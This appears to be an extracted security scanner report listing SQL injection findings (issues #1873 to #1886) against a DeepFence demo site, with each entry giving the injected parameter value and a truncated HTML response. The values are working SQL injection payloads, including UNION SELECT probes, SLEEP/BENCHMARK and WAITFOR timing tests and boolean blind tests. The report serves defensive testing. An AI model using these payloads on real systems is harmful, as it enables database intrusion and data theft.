href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1873\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AS INJECTX WHERE 1=1 AND 1=1-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1874\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# or benchmark(50000000,MD5(1)\n)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1875\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL\n,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1876\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 31337#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1877\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1878\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ';WAITFOR DELAY '0:0:30'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1879\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1880\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# HAVING 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1881\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1882\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1883\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# HAVING 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1884Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# RLIKE (SELECT (CASE WHEN (4346=4346) THEN \n0x61646d696e ELSE 0x28 END)) AND 'Txws'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1885\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1886\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# WHERE 1=1 AND 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 